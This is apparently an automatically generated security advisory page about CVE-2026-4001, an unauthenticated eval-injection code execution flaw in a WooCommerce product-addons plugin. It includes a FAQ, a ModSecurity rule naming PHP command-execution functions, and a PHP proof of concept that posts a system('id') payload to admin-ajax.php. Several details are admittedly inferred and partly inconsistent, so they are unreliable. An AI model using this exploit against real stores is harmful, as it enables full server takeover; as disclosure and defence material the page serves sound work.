What is CVE-2026-4001?

CVE-2026-4001 is a critical vulnerability affecting the Woocommerce Custom Product Addons Pro plugin for WordPress. It allows unauthenticated remote code execution through the custom pricing formula feature, specifically via the eval() function, which processes user input without adequate sanitization.

How does this vulnerability work?

The vulnerability arises because user-submitted values are passed directly to PHP’s eval() function without proper validation. Attackers can exploit this by submitting crafted input to a text field configured for custom pricing, allowing them to execute arbitrary PHP code on the server.

Who is affected by this vulnerability?

Any WordPress site using the Woocommerce Custom Product Addons Pro plugin version 5.4.1 or earlier is at risk. Administrators should check their plugin version and ensure it is updated to the patched version to mitigate the risk.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Woocommerce Custom Product Addons Pro plugin installed on your WordPress site. If it is version 5.4.1 or earlier, your site is vulnerable and should be updated immediately.

What is the CVSS score of this vulnerability?

CVE-2026-4001 has a CVSS score of 9.8, indicating a critical severity level. This score reflects the potential for complete system compromise without any authentication required, making it a significant risk for exposed systems.

What does the CWE-95 classification indicate?

CWE-95 indicates that the vulnerability is related to eval injection. This classification highlights that the core issue is the improper handling of user input that is executed as code, leading to the risk of arbitrary code execution.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the Woocommerce Custom Product Addons Pro plugin to version 5.4.2 or later, where the issue is likely addressed. Additionally, review your site’s security practices to ensure no other vulnerabilities exist.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows attackers to execute arbitrary commands on the server, potentially leading to full control over the WordPress installation. This could result in data theft, installation of malware, or further attacks on the server.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a POST request to the plugin’s AJAX handler, injecting malicious PHP code through a vulnerable text field. This example highlights the ease with which an attacker can exploit the vulnerability to execute system commands.

Is there a safe way to use eval() in PHP?

While eval() can be risky, if it must be used, it should be implemented with strict input validation and allowlisting of acceptable characters. However, it is generally recommended to avoid eval() altogether and use safer alternatives for evaluating expressions.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin or restricting access to the affected features until a safe update can be applied. Implementing additional security measures, such as a web application firewall, may also help mitigate risks.

How can I stay informed about vulnerabilities like this?

To stay informed, regularly follow security advisories from WordPress and plugin developers, subscribe to security mailing lists, and monitor vulnerability databases such as the National Vulnerability Database (NVD) for updates on newly discovered vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-4001: Woocommerce Custom Product Addons Pro <= 5.4.1 – Unauthenticated Remote Code Execution via Custom Pricing Formula (woo-custom-product-addons-pro)

CVE ID CVE-2026-4001

Plugin woo-custom-product-addons-pro

Severity Critical (CVSS 9.8)

CWE 95

Vulnerable Version 5.4.1

Patched Version —

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4001 (metadata-based):
This vulnerability is an unauthenticated remote code execution flaw in the Woocommerce Custom Product Addons Pro WordPress plugin. The vulnerability exists in the custom pricing formula evaluation feature. Attackers can execute arbitrary PHP code on the server by submitting malicious input to text fields configured with custom pricing formulas. The CVSS 9.8 score reflects the complete lack of authentication requirements and the direct path to full system compromise.

CWE-95 (Eval Injection) directly indicates the root cause. The plugin’s process_custom_formula() function in includes/process/price.php passes user-controlled input to PHP’s eval() function without proper neutralization. The description confirms the sanitize_values() method only strips HTML tags but fails to escape single quotes or prevent PHP code injection. Atomic Edge research infers that the plugin likely constructs a pricing formula string containing user-submitted field values, then evaluates it with eval(). This inference is based on the CWE classification and the explicit mention of {this.value} in custom pricing formulas.

Exploitation requires a WooCommerce product page with a WCPA text field configured to use custom pricing (pricingType: “custom”). Attackers submit a POST request containing malicious PHP code within the field value parameter. The payload must bypass the limited HTML tag stripping. A likely payload uses PHP’s system() or shell_exec() functions wrapped in single quotes. The request probably targets the plugin’s AJAX handler at /wp-admin/admin-ajax.php with an action parameter containing the plugin’s namespace. The exact parameter name for field values is inferred to be similar to ‘wcpa_field_value’ or ‘field_values’ based on plugin naming conventions.

Proper remediation requires removing the eval() function entirely and replacing it with a safe mathematical expression parser. If eval() must remain, the plugin must implement strict allowlisting of permitted characters (only numbers, mathematical operators, parentheses). User input should never be directly interpolated into executable code strings. The patched version 5.4.2 likely implements one of these approaches, though without code diff confirmation, Atomic Edge analysis cannot determine the exact fix.

Successful exploitation grants attackers complete control over the affected WordPress server. Attackers can execute operating system commands, install backdoors, access databases, and pivot to other systems on the network. Since the vulnerability requires no authentication, any public-facing WooCommerce store using the vulnerable plugin version is immediately at risk. The attacker gains the same privileges as the web server process, typically www-data or apache user.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4001 (metadata-based)
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:9404001,phase:2,deny,status:403,chain,msg:'CVE-2026-4001: Woocommerce Custom Product Addons Pro RCE via AJAX',severity:'CRITICAL',tag:'CVE-2026-4001',tag:'WordPress',tag:'Plugin',tag:'WooCommerce',tag:'RCE'"
  SecRule ARGS_POST:action "@rx ^wcpa" "chain"
    SecRule ARGS_POST "@rx \.(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|create_function|include|require|include_once|require_once)\([^)]*\)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4001 - Woocommerce Custom Product Addons Pro <= 5.4.1 - Unauthenticated Remote Code Execution via Custom Pricing Formula
<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Assumptions based on vulnerability description and WordPress plugin patterns:
// 1. The plugin uses admin-ajax.php for processing form submissions
// 2. The AJAX action parameter contains 'wcpa' (plugin abbreviation)
// 3. Field values are submitted via POST parameter 'wcpa_field_value' or similar
// 4. The product ID and field ID are required to target a vulnerable field
// 5. The field must have custom pricing enabled (pricingType: "custom")

$payload = "'.system("id").'"; // PHP code to execute via eval()
// Single quotes escape the string context, system() executes OS command
// The sanitize_values() method strips HTML tags but not single quotes

$post_data = [
    'action' => 'wcpa_ajax_process_form', // Inferred AJAX action name
    'product_id' => '123', // Target product ID with vulnerable field
    'wcpa_field_key' => 'field_1', // Target field ID with custom pricing
    'wcpa_field_value' => $payload, // Malicious PHP code injection
    'wcpa_form_id' => '456', // Form ID likely required
    'quantity' => '1', // Required for price calculation
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate WordPress AJAX request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest',
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

// If successful, the response may contain command output or error messages
// The eval() execution may not return visible output in HTTP response
// Attackers would use more sophisticated payloads for reverse shells

?>

Frequently Asked Questions

What is CVE-2026-4001?
Understanding the vulnerability
CVE-2026-4001 is a critical vulnerability affecting the Woocommerce Custom Product Addons Pro plugin for WordPress. It allows unauthenticated remote code execution through the custom pricing formula feature, specifically via the eval() function, which processes user input without adequate sanitization.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises because user-submitted values are passed directly to PHP’s eval() function without proper validation. Attackers can exploit this by submitting crafted input to a text field configured for custom pricing, allowing them to execute arbitrary PHP code on the server.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Woocommerce Custom Product Addons Pro plugin version 5.4.1 or earlier is at risk. Administrators should check their plugin version and ensure it is updated to the patched version to mitigate the risk.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the Woocommerce Custom Product Addons Pro plugin installed on your WordPress site. If it is version 5.4.1 or earlier, your site is vulnerable and should be updated immediately.
What is the CVSS score of this vulnerability?
Understanding severity
CVE-2026-4001 has a CVSS score of 9.8, indicating a critical severity level. This score reflects the potential for complete system compromise without any authentication required, making it a significant risk for exposed systems.
What does the CWE-95 classification indicate?
Root cause identification
CWE-95 indicates that the vulnerability is related to eval injection. This classification highlights that the core issue is the improper handling of user input that is executed as code, leading to the risk of arbitrary code execution.
How can I fix or mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the Woocommerce Custom Product Addons Pro plugin to version 5.4.2 or later, where the issue is likely addressed. Additionally, review your site’s security practices to ensure no other vulnerabilities exist.
What are the practical risks of this vulnerability?
Implications of exploitation
If exploited, this vulnerability allows attackers to execute arbitrary commands on the server, potentially leading to full control over the WordPress installation. This could result in data theft, installation of malware, or further attacks on the server.
What does the proof of concept demonstrate?
Example of exploitation
The proof of concept illustrates how an attacker can craft a POST request to the plugin’s AJAX handler, injecting malicious PHP code through a vulnerable text field. This example highlights the ease with which an attacker can exploit the vulnerability to execute system commands.
Is there a safe way to use eval() in PHP?
Best practices
While eval() can be risky, if it must be used, it should be implemented with strict input validation and allowlisting of acceptable characters. However, it is generally recommended to avoid eval() altogether and use safer alternatives for evaluating expressions.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updating is not possible, consider disabling the plugin or restricting access to the affected features until a safe update can be applied. Implementing additional security measures, such as a web application firewall, may also help mitigate risks.
How can I stay informed about vulnerabilities like this?
Keeping up to date
To stay informed, regularly follow security advisories from WordPress and plugin developers, subscribe to security mailing lists, and monitor vulnerability databases such as the National Vulnerability Database (NVD) for updates on newly discovered vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations